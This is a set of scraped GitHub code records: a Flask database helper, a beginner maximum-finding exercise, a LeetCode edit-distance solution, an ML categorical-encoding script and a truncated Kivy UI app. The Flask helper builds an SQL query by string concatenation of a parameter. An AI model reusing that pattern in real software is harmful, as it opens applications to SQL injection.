spectro_scope_config[variable])\n                value_control+=1\n\n        # Convert list into tuple\n        l_spectro_scope = tuple(l_spectro_scope)\n\n        # Execute UPDATE statement\n        conn.execute(string_sql,l_spectro_scope)\n\n        conn.commit()\n        conn.close()\n\ndef get_spectro_scope(param,app):\n    with app.app_context():\n        g.db = connect_db()\n        config_table = g.db.execute('select '+param+' from spectro_scope')\n        result = 0\n        try:\n            result = config_table.fetchall()[0][0]\n        except:\n            result = 0\n\n        g.db.close()\n        return result\n","repo_name":"spectro-pointer/spectroscope-OceanOptics","sub_path":"webpage/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4872690809","text":"# Problem\r\n# Given 9 distinct natural numbers, write a program that finds the maximum among them and reports its position.\r\n#\r\n# For example, given the 9 distinct natural numbers\r\n#\r\n# 3, 29, 38, 12, 57, 74, 40, 85, 61\r\n#\r\n# the maximum is 85, and it is the 8th number.\r\n#\r\n# Input\r\n# From the first line to the ninth line, one natural number is given per line. 
Each given natural number is less than 100.\r\n#\r\n# Output\r\n# Print the maximum value on the first line, and on the second line print the position of that maximum.\r\n\r\n\r\nnum = int(input(\"How many distinct natural numbers will you enter? (N) : \"))\r\ninput_list = []\r\n\r\n\r\ndef find_max_value():\r\n\r\n    print(f\"You will enter {num} numbers\")\r\n    print(\"=\" * 5)\r\n    for i in range(num):\r\n        value = int(input())\r\n        input_list.append(value)\r\n    print(\"=\" * 5)\r\n\r\n    print(\r\n        f\"maximum = {max(input_list)} / it is at position {input_list.index(max(input_list))+1}\"\r\n    )\r\n\r\n\r\nfind_max_value()\r\n","repo_name":"ksm0207/Algorithm","sub_path":"Part #3/example02.py","file_name":"example02.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20284992105","text":"class Solution:\n    \"\"\"20190902\"\"\"\n\n    def minDistance(self, word1: str, word2: str) -> int:\n        \"\"\"\n        Hard difficulty; it does not feel easy to solve.\n        First consider making the two words the same length, then compare.\n        But even at equal lengths, it can be cheaper to delete first and then insert.\n\n        1\n        https://leetcode.com/problems/edit-distance/discuss/159295/Python-solutions-and-intuition\n\n        2\n        A good method, though not necessarily one I would have come up with myself.\n\n        >>> Solution().minDistance('sea','eat')\n        2\n        >>> Solution().minDistance('intention','execution')\n        5\n        \"\"\"\n        m = len(word1)\n        n = len(word2)\n        table = [[0] * (n + 1) for _ in range(m + 1)]\n\n        for i in range(m + 1):\n            table[i][0] = i\n        for j in range(n + 1):\n            table[0][j] = j\n\n        for i in range(1, m + 1):\n            for j in range(1, n + 1):\n                if word1[i - 1] == word2[j - 1]:\n                    table[i][j] = table[i - 1][j - 1]\n                else:\n                    table[i][j] = 1 + min(table[i - 1][j], table[i][j - 1], table[i - 1][j - 1])\n        return table[-1][-1]\n\n\nif __name__ == '__main__':\n    import doctest\n\n    doctest.testmod(verbose=True)\n","repo_name":"pingfangx/pythonx","sub_path":"ToolsX/leetcode/0072/0072_2.py","file_name":"0072_2.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"} +{"seq_id":"16040433114","text":"import os\nimport string\nimport joblib\nimport numpy as np\nimport pandas as pd\nfrom . 
import dispatcher\nimport category_encoders as ce\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\n\nKFOLDS_DATA = os.environ.get('KFOLDS_DATA')\nNOM_ENC = os.environ.get('NOM_ENCODER')\nENCODED_DATA = os.environ.get('ENCODED_DATA')\nTEST_DATA = os.environ.get('TEST_DATA')\nENCODED_TEST_DATA = os.environ.get('ENCODED_TEST_DATA')\nTRAINING_DATA = os.environ.get('TRAINING_DATA')\n\ndef apply_encoding(encoding, df, cols = None, mapping = None, n_components = None, save = True):\n if cols == None:\n df = df.astype('str')\n else: \n df[cols] = df[cols].astype('str')\n\n if encoding == 'Ordinal':\n '''\n mapping : [{'col': 'ord_1', 'mapping': {'Novice': 5, 'Contributor': 4, 'Expert': 3, 'Master': 2, 'Grandmaster': 1}},\n {'col': 'ord_2', 'mapping': {'Freezing': 6, 'Cold': 5, 'Warm': 4, 'Hot': 3, 'Boiling Hot': 2, 'Lava Hot': 1}},\n {'col': 'ord_3', 'mapping': {i: ord(i)-ord('a')+1 for i in string.ascii_lowercase[:15]}},\n {'col': 'ord_4', 'mapping': {i: ord(i)-ord('A')+1 for i in string.ascii_uppercase}}]\n '''\n encoder = ce.ordinal.OrdinalEncoder(cols = cols, mapping=mapping)\n df = encoder.fit_transform(df)\n print('Encoded, Columns: ' + str(len(df.columns)))\n if save:\n if cols == None:\n name = 'allcols'\n else:\n name = ''.join(cols)\n joblib.dump(encoder, f'F:\\\\Workspace\\\\CFEC2\\\\models\\\\{name}_encoder.pkl')\n\n elif encoding == 'OneHot':\n encoder = ce.OneHotEncoder(cols=cols)\n df = encoder.fit_transform(df)\n print('Encoded, Columns: ' + str(len(df.columns)))\n if save:\n if cols == None:\n name = 'allcols'\n else:\n name = ''.join(cols)\n joblib.dump(encoder, f'F:\\\\Workspace\\\\CFEC2\\\\models\\\\{name}_encoder.pkl')\n\n elif encoding == 'Hashing':\n encoder = ce.hashing.HashingEncoder(cols = cols, n_components = n_components)\n df = encoder.fit_transform(df)\n rename = {'col_'+str(i): cols[0] + '_' +str(i) for i in range(n_components)}\n df.rename(columns = rename, inplace = True)\n print('Encoded, Columns: ' + str(len(df.columns)))\n if save:\n if cols == None:\n name = 'allcols'\n else:\n name = ''.join(cols)\n joblib.dump(encoder, f'F:\\\\Workspace\\\\CFEC2\\\\models\\\\{name}_encoder.pkl')\n return df\n\ndef encode_test_data(df, cols = None, rename_cols = False, n_components = None):\n '''\n rename_cols - to be used with HashingEncoder to rename the cols.\n '''\n if cols == None:\n df = df.astype('str')\n encoder = joblib.load(f'F:\\\\Workspace\\\\CFEC2\\\\models\\\\allcols_encoder.pkl')\n df = encoder.transform(df) \n return df\n \n df[cols] = df[cols].astype('str')\n name = ''.join(cols)\n encoder = joblib.load(f'F:\\\\Workspace\\\\CFEC2\\\\models\\\\{name}_encoder.pkl')\n df = encoder.transform(df)\n if rename_cols:\n rename = {'col_'+str(i): cols[0] + '_' + str(i) for i in range(n_components)}\n df.rename(columns = rename, inplace = True)\n\n print(', '.join(cols) + ' Encoded, Columns: ' + str(len(df.columns)))\n return df\n\nif __name__ == '__main__': \n df = pd.read_csv(TRAINING_DATA)\n orig_train = df.copy()\n df_test = pd.read_csv(TEST_DATA)\n # orig_test = df_test.copy()\n\n df = df.drop(['target'], axis = 1)\n # df_test = df_test.drop(['id', 'day', 'month'], axis = 1)\n\n # fill NaN values with most frequent value in the column.\n df_test = df_test.fillna(df.apply(lambda x: x.value_counts().idxmax()))\n\n #Let's apply One-Hot encoding to the binary variables first\n #convert the data to string type as ce encoders don't work with int.\n df = apply_encoding('OneHot', df, cols = ['bin_0', 'bin_1', 'bin_2', 
'bin_3', 'bin_4', 'nom_0', 'nom_1', 'nom_2', 'nom_3', 'nom_4'])\n    df_test = encode_test_data(df_test, cols = ['bin_0', 'bin_1', 'bin_2', 'bin_3', 'bin_4', 'nom_0', 'nom_1', 'nom_2', 'nom_3', 'nom_4'])\n    print(df.columns)\n    print(df_test.columns)\n\n    #Let's encode high-cardinality nominal features [nom_5-nom_9].\n    n_components = [11, 11, 8, 8, 12]\n    columns = ['nom_5', 'nom_6', 'nom_7', 'nom_8', 'nom_9']\n    for i, x in enumerate(columns):\n        df = apply_encoding('Hashing', df, cols=[x], n_components = n_components[i])\n        df_test = encode_test_data(df_test, cols = [x], rename_cols = True, n_components = n_components[i])\n\n    # We'll use ord_0 as is.\n    df['ord_0'] = df['ord_0'].astype('float64').astype('int32')\n    df_test['ord_0'] = df_test['ord_0'].astype('float64').astype('int32')\n    print('ord_0 encoded, Columns: ' + str(len(df.columns)))\n\n    mapping=[{'col': 'ord_1', 'mapping': {'Novice': 5, 'Contributor': 4, 'Expert': 3, 'Master': 2, 'Grandmaster': 1}},\n             {'col': 'ord_2', 'mapping': {'Freezing': 6, 'Cold': 5, 'Warm': 4, 'Hot': 3, 'Boiling Hot': 2, 'Lava Hot': 1}},\n             {'col': 'ord_3', 'mapping': {i: ord(i)-ord('a')+1 for i in string.ascii_lowercase[:15]}}, # mapping alphabets to numbers\n             {'col': 'ord_4', 'mapping': {i: ord(i)-ord('A')+1 for i in string.ascii_uppercase}}] # mapping alphabets to numbers\n\n    df = apply_encoding('Ordinal', df, mapping = mapping)\n    df_test = encode_test_data(df_test)\n    print(df.columns)\n\n    #We'll apply binary encoding to ordinal features with high cardinality\n    df.to_csv(ENCODED_DATA, index=False)\n    df_test.to_csv(ENCODED_TEST_DATA, index = False)\n\n    # # We'll encode ord_5 with OrdinalEncoder without any mapping because we don't know anything about it.\n    # cols = ['bin_0', 'bin_1', 'bin_2', 'bin_3', 'bin_4', 'nom_0', 'nom_1',\n    #         'nom_2', 'nom_3', 'nom_4', 'nom_5', 'nom_6', 'nom_7', 'nom_8', 'nom_9',\n    #         'ord_0', 'ord_1', 'ord_2', 'ord_3', 'ord_4', 'ord_5', 'day', 'month']\n    # print(cols)\n    # # df = apply_encoding('Ordinal', df, cols = cols)\n    # # df_test = encode_test_data(df_test, cols = cols)\n\n    # scaler = StandardScaler()\n    # df[cols] = scaler.fit_transform(df[cols])\n    # df_test[cols] = scaler.fit_transform(df_test[cols])\n    # print(df)\n\n    # # df['kfolds'] = orig_train['kfolds']\n    # df['target'] = orig_train['target']\n    # # df_test['id'] = orig_test['id']","repo_name":"sharma-harish/ML_Framework","sub_path":"src/categorical_features.py","file_name":"categorical_features.py","file_ext":"py","file_size_in_byte":6588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41703476787","text":"import sys, os\nfrom os.path import dirname, join, abspath\nsys.path.insert(0, dirname(dirname(abspath(__file__))))\nfrom mind import *\n\n# PROJECT FOLDERS\npatch = dirname(dirname(abspath(__file__)))\nasset = patch + '/_assets/drawable-mdpi/'\nfont = patch + '/_fonts/'\nsound = patch + '/_sounds/'\nbehavior = patch + '/_behavior/'\n\nprint(\".: ASSETS DIR\", asset)\nprint(\".: FONTS DIR\", font)\nprint(\".: SOUND DIR\", sound)\nprint(\".: BEHAVIOR DIR\", behavior)\nclass Label(Label):\n    font_name = StringProperty(font + \"Roboto-Regular.ttf\")\nclass Relatstencil(RelativeLayout,StencilView): pass\n\n\n\nclass especialbutton(RelativeLayout):\n    posx = NumericProperty(0)\n    posy = NumericProperty(0)\n    opa = NumericProperty(.35)\n    size_hint_y = NumericProperty(None)\n\n    height = NumericProperty(dp(36))\n\n\n    def __init__(self,**kwargs):\n        super().__init__()\n        thelabel = Label(markup = True,text = \"[b]Dale un 
Icono\",)\n self.wid = Relatstencil(size = (125,self.height), size_hint = (None,None))\n\n\n Clock.schedule_interval(lambda x: self.animate(), 3.0)\n \n with self.wid.canvas.before:\n Color(1.0, 0.396078431372549, 0.6235294117647059, 1.0)\n RoundedRectangle(size = (125,self.height),segments = 4, pos = (0,0),group = \"asd\")\n Color(1,1,1,1)\n Mesh(vertices=[self.posx+0, self.posy+0, 0, 0,self.posx+75, self.posy+50, 0, 0,self.posx+125, self.posy+50, 0, 0,self.posx+50, self.posy+0, 0, 0], indices=[0,1,2,3], mode = 'triangle_fan',group = \"asd\")\n \n \n\n \n self.add_widget(self.wid)\n self.wid.add_widget(thelabel)\n \n \n\n self.thelabel = thelabel\n def animate(self,*args):\n Animation.stop_all(self, 'posx')\n Animation.stop_all(self, 'opa')\n Animation.stop_all(self.thelabel, 'opacity')\n \n \n x = (Animation(posx = 125, opa = .10, d = .75, t = 'in_expo' ) \n + Animation(posx = 250, opa = .35, d = .75, t = 'out_expo' )\n + Animation(posx = -125, d = 0 ))\n \n \n y = (\n Animation(opacity = .5, d = .75, t = 'in_expo' ) \n + Animation(opacity = 1, d = .75, t = 'out_expo' )) \n y.start(self.thelabel)\n x.start(self) \n def change_mode(self, mode, *largs):\n self.mesh.mode = mode\n\n def on_posx(self,*args):\n self.wid.canvas.before.remove_group(\"asd\")\n \n with self.wid.canvas.before:\n Color(1.0, 0.396078431372549, 0.6235294117647059, 1.0)\n RoundedRectangle(size = (125,self.height),segments = 4, pos = (0,0),group = \"asd\")\n Color(1,1,1,self.opa)\n Mesh(vertices=[self.posx+0, self.posy+0, 0, 0,self.posx+75, self.posy+50, 0, 0,self.posx+125, self.posy+50, 0, 0,self.posx+50, self.posy+0, 0, 0], indices=[0,1,2,3], mode = 'triangle_fan',group = \"asd\")\n \nclass DisplayMenu(GridLayout):\n size_hint = (1,None)\n height = NumericProperty(dp(64))\n rows = 1\n class DisplayMenuItem(ButtonBehavior, RelativeLayout):\n size_hint = (None, 1)\n width = NumericProperty(dp(64))\n insideimgsize = ListProperty([dp(64),dp(64)])\n def __init__(child,**kwargs):\n super().__init__()\n \n with child.canvas:\n Color(1,1,.5,1)\n Rectangle(source = kwargs[\"source\"], size = child.insideimgsize, pos = (32 - child.insideimgsize[0]/2, 47 - child.insideimgsize[1]/2 ))\n \n child.bind(on_release = lambda x: child.animate())\n child.source = kwargs[\"source\"]\n \n def animate(child, *args): (Animation(insideimgsize = [dp(64*.70),dp(64*.70)] , d = .25/2.5, t = 'out_quart') + Animation(insideimgsize = [dp(64),dp(64)] , d = .5*.90, t = 'out_back')).start(child)\n def on_insideimgsize(child, *args):\n child.canvas.clear()\n with child.canvas:\n Color(1,1,.5,1)\n Rectangle(source = child.source, size = child.insideimgsize, pos = (32 - child.insideimgsize[0]/2, 47 - child.insideimgsize[1]/2 ))\n\n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n three = [\"hud15\",\"hud14\",\"hud16\"]\n this.add_widget(Label())\n for i in range(3): this.add_widget(this.DisplayMenuItem(source = asset + three[i] + \".png\"))\n this.add_widget(Label())\n \nclass Display(ButtonBehavior,RelativeLayout):\n size_hint = (1,None)\n height = NumericProperty(dp(64))\n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n this.add_widget(Label(text = \"[color=#000000]00:00:00\",markup = True, font_size = 64))\n \n \n \nclass LyricsDisplay(RelativeLayout):\n size_hint = (1,None)\n height = NumericProperty(dp(20))\n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n this.add_widget(Label(text = \"[color=#000000]0 Horas, 0 Minutos y 0 Segundos\",markup = True, font_size = 20))\n \nclass BottomNavigatorScroll(ScrollView):\n 
NoItems = NumericProperty(0)\n catch_Scrollposx = NumericProperty(0)\n CurrentAnimation = None\n \n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n \n this.bind(on_touch_down = lambda u,z: this.prepare())\n this.bind(on_scroll_stop = this.getcloser)\n this.bind(on_scroll_start = lambda u,z: setattr(this, 'catch_Scrollposx', this.scroll_x))\n \n \n def prepare(this,*args):\n try:\n Animation.stop_all(this, 'scroll_x')\n print(\"Canceled.\")\n except:\n print(\"There is no Currentanimation to cancel.\")\n \n def getcloser(this, *args):\n straight = -1\n print(straight)\n if this.scroll_x > this.catch_Scrollposx: straight *= -1\n \n print (this.NoItems)\n unit = 1.0 / (this.NoItems)\n print (straight)\n list = []\n c = 0\n list.append(0)\n for i in range(this.NoItems):\n list.append((unit) * (i+1) + ((unit/(this.NoItems-1)) * (i+1)))\n c += 1\n list = list[:-1]\n import pprint\n pp = pprint.PrettyPrinter(depth=6)\n \n \n prox = min(list, key=lambda x:abs(x-(this.scroll_x+(.25*.30*straight))))\n this.CurrentAnimation = Animation(scroll_x = prox, d = .25, t = 'out_back')\n this.CurrentAnimation.start(this)\n print(list)\n\nclass TopChooser(RelativeLayout):\n size_hint = (1,None)\n height = NumericProperty(dp(94))\n \n class TopChooserTimericon(RelativeLayout):\n size_hint = (None,None)\n height = NumericProperty(dp(24))\n width = NumericProperty(dp(24))\n pos_hint = DictProperty({'center_y':.75})\n def __init__(child, **kwargs):\n super().__init__()\n with child.canvas:\n Color(1,1,1,1)\n Rectangle(source = asset + \"clock.png\", size = (child.width, child.height))\n \n def on_pos(child, *args):\n child.canvas.clear()\n with child.canvas:\n Rectangle(source = asset + \"clock.png\", size = (child.width, child.height))\n \n class TopChooserItem(ButtonBehavior, RelativeLayout):\n size_hint = (None, 1)\n width = NumericProperty(dp(64))\n insideimgsize = ListProperty([dp(64),dp(64)])\n def __init__(child,**kwargs):\n super().__init__()\n \n with child.canvas:\n Color(1,1,1,1)\n Rectangle(source = kwargs[\"source\"], size = child.insideimgsize, pos = (32 - child.insideimgsize[0]/2, 47 - child.insideimgsize[1]/2 ))\n \n child.bind(on_release = lambda x: child.animate())\n child.source = kwargs[\"source\"]\n\n def animate(child, *args): (Animation(insideimgsize = [dp(32),dp(32)] , d = .25/2, t = 'out_quart') + Animation(insideimgsize = [dp(64),dp(64)] , d = .25/2, t = 'out_expo')).start(child)\n def on_insideimgsize(child, *args):\n child.canvas.clear()\n with child.canvas:\n Color(1,1,1,1)\n Rectangle(source = child.source, size = child.insideimgsize, pos = (32 - child.insideimgsize[0]/2, 47 - child.insideimgsize[1]/2 ))\n\n \n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n \n relativelayoutgrid = GridLayout(rows = 1, spacing = dp(16))\n \n for i in range(18): relativelayoutgrid.add_widget(this.NewChooserItem(source = asset + \"bread.png\"))\n \n scrollrelativelayout = RelativeLayout(size_hint_x = None, width = 1500); scrollrelativelayout.add_widget(relativelayoutgrid); scrollrelativelayout.add_widget(this.TopChooserTimericon())\n scroll = ScrollView(bar_color = (1,1,1,0),bar_inactive_color = (1,1,1,0)); scroll.add_widget(scrollrelativelayout)\n this.add_widget(scroll)\n \n def NewChooserItem(this, **kwargs): \n TopChooseritem = this.TopChooserItem(**kwargs)\n TopChooseritem.bind(on_release = lambda z:Animation(x = z.x , d = 1, t = 'out_back').start(this.children[0].children[0].children[0]))\n \n return TopChooseritem\n \nclass Tag(RelativeLayout):\n def __init__(self, 
**kwargs):\n super().__init__()\n self.size_hint_y = kwargs[\"size_hint_y\"]\n self.size_hint_x = None\n self.height = kwargs[\"height\"]\n self.width = dp(64+8)\n with self.canvas:\n Color(1.0, 0.5, 0.875, 1.0)\n RoundedRectangle(size = (dp(64), dp(24)), pos = (4,0))\n self.label = Label(text = kwargs[\"tag_text\"], markup = True ,size_hint = (None,None),size = (dp(64), dp(24)), pos = (0,0))\n self.add_widget(self.label)\nclass BottomNavigator(GridLayout):\n rows = 1\n height = NumericProperty(dp(64))\n width = NumericProperty(0)\n size_hint_x = NumericProperty(None)\n backcolor1 = ListProperty([.1,.1,.1,1])\n backcolor2 = ListProperty([.11,.11,.11,1])\n opened = BooleanProperty(False)\n class BottomNavigatorItem(ButtonBehavior,RelativeLayout):\n cols = 1\n opacity = NumericProperty(.96)\n opened = BooleanProperty(False)\n class Layer1(RelativeLayout):\n def __init__(child, **kwargs):\n super().__init__()\n \n with child.canvas:\n Color(1.0, 0.5, 0.875, 1.0)\n RoundedRectangle(size = (dp(64), dp(24)), pos = (Window.width*.725 - dp(32), dp(64)*.30 - dp(12)))\n child.label = Label(text = kwargs[\"tag_text\"], markup = True ,size_hint = (None,None),size = (dp(64), dp(24)), pos = (Window.width*.725 - dp(32), dp(64)*.30 - dp(12)))\n child.add_widget(child.label)\n \n \n \n def __init__(child, **kwargs):\n super().__init__()\n child.SmallLabel = Label(text = kwargs[\"text\"], text_size = (Window.width/2, dp(64)), valign = 'middle' , halign = 'left',markup = True, font_size = 18)\n child.Biglabel = Label(text = kwargs[\"timetext\"],markup = True, font_size = 30)\n insidegrid = GridLayout(rows = 1); insidegrid.add_widget(child.Biglabel); insidegrid.add_widget(child.SmallLabel)\n rootgrid = GridLayout(cols = 1); rootgrid.add_widget(insidegrid)\n \n child.add_widget(rootgrid)\n for tagtext in kwargs[\"tags\"]:\n child.add_widget(child.Layer1(tag_text = tagtext))\n \n \n child.bind(on_release = lambda x: child.switch())\n def switch(child,*args):\n if child.opened == True: \n child.close()\n child.opened = False\n elif child.opened == False: \n child.open()\n child.opened = True\n def open(child,*args):\n print(\"PROBANDO\")\n child.Biglabel.text = child.Biglabel.text.replace(\"ffffff\",\"000000\")\n child.SmallLabel.text = child.SmallLabel.text.replace(\"ffffff\",\"000000\")\n \n def close(child,*args):\n print(\"PROBANDO\")\n child.Biglabel.text = child.Biglabel.text.replace(\"000000\",\"ffffff\")\n child.SmallLabel.text = child.SmallLabel.text.replace(\"000000\",\"ffffff\")\n \n def __init__(this, **kwargs): \n super().__init__(**kwargs)\n\n this.add_widget(this.BottomNavigatorItem(timetext = \"[color=#ffffff]00M'00S\",tags = [\"tag\"], text = \"[color=#ffffff]Nueva Receta\\n[/size][size=16sp][color=#898989ff]Autor[/color]\"))\n for i in range(5): this.add_widget(this.BottomNavigatorItem(timetext = \"[color=#ffffff]11M'30S\",tags = [\"Puerco\"], text = \"[color=#ffffff]Titulo de Receta\\n[/size][size=16sp][color=#898989ff]Autor[/color]\"))\n for children in this.children: this.width += Window.width\n with this.canvas.before:\n Color(1,1,1,1)\n Rectangle(size = (this.size[0]*1.5, this.size[1]) , pos = (-(this.size[0]*0.25), 0), texture = Gradient.vertical((.1,.1,.1,1),(.11,.11,.11,1)))\n def on_backcolor1(this,*args):\n this.canvas.before.clear()\n with this.canvas.before:\n Color(1,1,1,1)\n Rectangle(size = (this.size[0]*1.5, this.size[1]) , pos = (-(this.size[0]*0.25), 0), texture = 
Gradient.vertical((this.backcolor1[0],this.backcolor1[1],this.backcolor1[2],this.backcolor1[3]),(this.backcolor2[0],this.backcolor2[1],this.backcolor2[2],this.backcolor2[3])))\n \n def switch(this,*args):\n if this.opened == True: \n this.close()\n this.opened = False\n elif this.opened == False: \n this.open()\n this.opened = True\n def open(this,*args):\n print (\"a\")\n Animation(backcolor1 = [1,1,1,1], backcolor2 = [.99,.99,.99,1], d = .5 , t ='out_circ').start(this)\n \n def close(this,*args):\n print (\"a\")\n Animation(backcolor1 = [.1,.1,.1,1], backcolor2 = [.11,.11,.11,1], d = .5 , t ='out_circ').start(this)\n \n\n\n \nclass Keyboard(GridLayout):\n cols = 1\n size_hint_y = NumericProperty(None)\n state = BooleanProperty(False)\n height = NumericProperty(dp(54)*4)\n padding = [dp(33),0,dp(33),0]\n print((Window.width - 33)/ 3.0 , \"ALINIACION\",\"@Keyboard\")\n CurrentAnimation = None\n \n \n class Key(ButtonBehavior,RelativeLayout):\n insideimgsize = ListProperty([dp(15),dp(32)])\n opacity = NumericProperty(1)\n strk = StringProperty(\"\")\n source = StringProperty(\"\")\n animationellipsesize = ListProperty([dp(0),dp(0)])\n animationellipseopacity = NumericProperty(1)\n animationellipsecolor = ListProperty([.91,.91,.91])\n def __init__(child,**kwargs):\n super().__init__(**kwargs)\n \n \n child.paper = RelativeLayout(size_hint = (None,None),pos_hint = {'center_x':.5, 'center_y':.5}, size = (dp(15),dp(30)))\n \n child.add_widget(child.paper)\n \n \n \n with child.paper.canvas:\n Color(child.animationellipsecolor[0],child.animationellipsecolor[1],child.animationellipsecolor[2],child.animationellipseopacity)\n Ellipse(size = child.animationellipsesize, pos = (dp(15)/2 - child.animationellipsesize[0]/2, dp(30)/2 - child.animationellipsesize[1]/2))\n \n Color(1,1,1,1)\n Rectangle(size = child.insideimgsize, source = child.source, pos = (dp(15)/2 - child.insideimgsize[0]/2, dp(30)/2 - child.insideimgsize[1]/2 ))\n \n child.bind(on_release = lambda x: child.animation())\n \n def on_animationellipsesize(child, *args):\n child.paper.canvas.clear()\n with child.paper.canvas:\n Color(child.animationellipsecolor[0],child.animationellipsecolor[1],child.animationellipsecolor[2],child.animationellipseopacity)\n Ellipse(size = child.animationellipsesize, pos = (dp(15)/2 - child.animationellipsesize[0]/2, dp(30)/2 - child.animationellipsesize[1]/2))\n Color(1,1,1,1)\n Rectangle(size = child.insideimgsize, source = child.source, pos = (dp(15)/2 - child.insideimgsize[0]/2, dp(30)/2 - child.insideimgsize[1]/2 ))\n \n def animation(child,*args):\n Animation.stop_all(child, 'animationellipseopacity')\n child.animationellipseopacity = 1\n child.animationellipsesize = (0,0)\n x = Animation(animationellipsesize = (dp(64),dp(64)), animationellipseopacity = 0, d = .5 , t = 'out_quart')\n x.start(child)\n \n def on_insideimgsize(child, *args):\n child.paper.canvas.clear()\n with child.paper.canvas:\n Rectangle(size = child.insideimgsize, source = child.source, pos = (dp(15)/2 - child.insideimgsize[0]/2, dp(30)/2 - child.insideimgsize[1]/2 ))\n \n def __init__(this, **kwargs):\n super().__init__(**kwargs)\n \n grid = GridLayout(cols = 3)\n \n for i in range(9): grid.add_widget(this.Key(source = asset + str(i+1) + \".png\", strk = str(i+1)))\n \n grid.add_widget(Widget())\n grid.add_widget(this.Key(source = asset + str('0') + \".png\", strk = str(0)))\n grid.add_widget(Widget())\n this.add_widget(grid)\n \n this.y = (dp(54)*-4)\n this.opacity = 0\n \n def switch(this, *args):\n this.prepare()\n if this.state 
== True:\n this.CurrentAnimation = Animation(y = dp(64 + 16), opacity = 0, d = .25 , t = 'out_quart') + Animation(y = -(this.height), d = 0.25/4 , t = 'out_expo')\n this.CurrentAnimation.start(this)\n this.state = False\n else:\n this.y = dp(64 + 16)\n this.opacity = 0\n this.CurrentAnimation = Animation(y = dp(64 + 16), opacity = 1, d = .25 , t = 'out_back')\n this.CurrentAnimation.start(this)\n this.state = True\n \n def prepare(this,*args):\n try:\n this.CurrentAnimation.cancel()\n print(\"Canceled.\")\n except:\n print(\"There is no Currentanimation to cancel.\")\n \n \n \nclass Layer1(RelativeLayout):\n typingstateopacity = NumericProperty(1)\n typestateopacity = NumericProperty(1)\n typestate = BooleanProperty(False)\n \n class LockedStateButton(ButtonBehavior, RelativeLayout):\n source = StringProperty(asset + \"lock0.png\")\n xscale = NumericProperty(1.0)\n \n def __init__(child,**kwargs):\n super().__init__(**kwargs)\n with child.canvas: \n Color(1,1,1,1)\n Rectangle(source = child.source, size = (dp(50),dp(50)))\n \n child.bind(on_release = lambda x: child.Animatesize())\n \n def on_xscale(child,*args):\n print (child.xscale)\n child.canvas.clear()\n xsize = dp(50)*child.xscale,dp(50)*child.xscale\n with child.canvas: \n Color(1,1,1,1)\n Rectangle(source = child.source, size = xsize , pos = (dp(50)/2 - xsize[0]/2,dp(50)/2 - xsize[1]/2))\n \n \n def Animatesize(child,*args):\n print(\"animating\")\n try:\n if child.source == asset + \"lock0.png\":\n child.source = asset + \"lock1.png\"\n elif child.source == asset + \"lock1.png\" :\n child.source = asset + \"lock0.png\"\n except:\n pass\n\n child.xscale = 1.0\n anim1 = Animation(xscale = .75, d = .05,t = \"in_circ\")\n anim2 = Animation(xscale = 1.0, d = .15,t = \"out_circ\")\n anim = anim1 + anim2\n anim.start(child)\n \n \n \n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n \n grid = GridLayout(cols = 1);\n \n this.add_widget(grid);\n \n Space0 = Widget(size_hint_y = None , height = dp(16))\n Space1 = Widget(size_hint_y = None , height = dp(32-15))\n Space2 = Widget(size_hint_y = None , height = dp(64))\n Space3 = Widget(size_hint_y = None , height = dp(64))\n \n locksize = (dp(50),dp(50))\n this.lock = this.LockedStateButton(pos = (Window.width*.9 - (locksize[0]/2), dp(94) - (locksize[1]/2)))\n Topchooserlayer = RelativeLayout(height = dp(94), size_hint_y = None)\n this.Displaylayer = RelativeLayout(height = dp(94), size_hint_y = None); this.Displaylayer.add_widget(this.lock)\n \n grid.add_widget(Topchooserlayer);\n grid.add_widget(Space2);\n grid.add_widget(this.Displaylayer);\n\n \n \n with this.Displaylayer.canvas:\n Color(1,1,1,this.typestateopacity)\n Rectangle(group = 'a',source = asset + \"typing.png\", size = (locksize), pos = (Window.width*.8 - (locksize[0]/2), dp(94) - (locksize[1]/2)))\n \n def on_typestateopacity(this,*args):\n \n locksize = (dp(50),dp(50))\n this.Displaylayer.canvas.remove_group('a')\n \n with this.Displaylayer.canvas:\n Color(1,1,1,this.typestateopacity)\n Rectangle(group = 'a',source = asset + \"typing.png\", size = (locksize), pos = (Window.width*.8 - (locksize[0]/2), dp(94) - (locksize[1]/2)))\n \n \n\n def switchtypestate(this,*args):\n if this.typestate == True:\n Animation(typestateopacity = 0, d = .5, t = 'out_circ').start(this)\n this.typestate = False\n else:\n Animation(typestateopacity = 1, d = .5, t = 'out_circ').start(this)\n this.typestate = True\n \n \nclass MainActivitie(RelativeLayout):\n CurrentAnimation = None\n \n class Layer2(GridLayout):\n cols = 
NumericProperty(1)\n size_hint_y = NumericProperty(2)\n pos_hint = DictProperty({'y':-1})\n opened = BooleanProperty(False)\n backcolor = ListProperty([.1,.1,.1,1])\n def __init__(child,**kwargs):\n super().__init__()\n child.space = Widget(size_hint_y = None, height = Window.height - dp(64))\n child.add_widget(child.space)\n BottomNav = BottomNavigator()\n BottomScroll = BottomNavigatorScroll(size_hint_y = None, height = dp(64), NoItems = 6); BottomScroll.add_widget(BottomNav)\n child.add_widget(BottomScroll)\n child.pizzarra = RelativeLayout(size_hint_y = None, height = Window.height )\n child.newcanvas = Widget()\n child.pizzarra.add_widget(child.newcanvas)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n container = GridLayout(rows = 1, size_hint_y = None, height = dp(36));container.add_widget(Label());container.add_widget(especialbutton());container.add_widget(Label())\n facecanvas = RelativeLayout(size_hint_y = None, height = dp(64+16)*1.5)\n tagsgrid = GridLayout(rows = 1, size_hint_y = None, height = dp(24))\n tagsgrid.add_widget(Widget())\n tagsgrid.add_widget(Tag(tag_text = \"Tag1\", size_hint_y = None, height = dp(24)))\n 